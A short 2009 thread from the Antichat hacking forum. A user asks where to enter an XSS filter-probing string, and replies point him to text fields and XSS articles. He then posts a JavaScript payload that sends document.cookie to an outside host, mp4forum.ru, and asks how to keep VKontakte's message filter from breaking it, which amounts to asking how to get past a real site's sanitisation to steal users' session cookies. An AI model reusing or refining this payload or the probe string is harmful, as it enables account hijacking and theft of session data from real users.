Форум АНТИЧАТ - фильтор

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - фильтор (https://forum.antichat.xyz/showthread.php?t=113691)

Plaf-di

30.03.2009 03:36

фильтор

извеняюсь если гдето это было я не нашёл...

я прочитал:
### А как определить есть фильтр или нет?

Просто в любое поле вводим: '';!--"<fuck>=&{()}
Дальше открываем html страничку и ищем слово "fuck"
и смотри ...........

фильтрации вот так: "><>'"`,/\?@%
и у меня вопрос....
куда писать ';!--"<fuck>=&{()}
да и вобще немоглибы по подробнее расказать про это?

и ещё раз извеняюсь...

m0Hze

30.03.2009 05:34

В тектовые поля.Поподробнеетолько статьи об XSS тебе раскажут.Разжовано все не один раз с 2005 года,просто поищи.

DrAssault

30.03.2009 05:52

В статье Микроба всё подробно описано, если мне память не изменяет это как раз из неё пример, почитай ещё статьи про XSS, понимание придёт со временем...

Plaf-di

30.03.2009 18:45

m0Hze
тоесть надо в любое место где можно в вести текст...
а не в адресную строку.

и ещё незнаете как сделать чтобы
...javascript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.cookie;</script>')...
после того как отпровляешь вконтакте сообщении не стоновилось
...javas?1?ript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.?4??4??1?ki?1?;</script>')...

Время: 18:50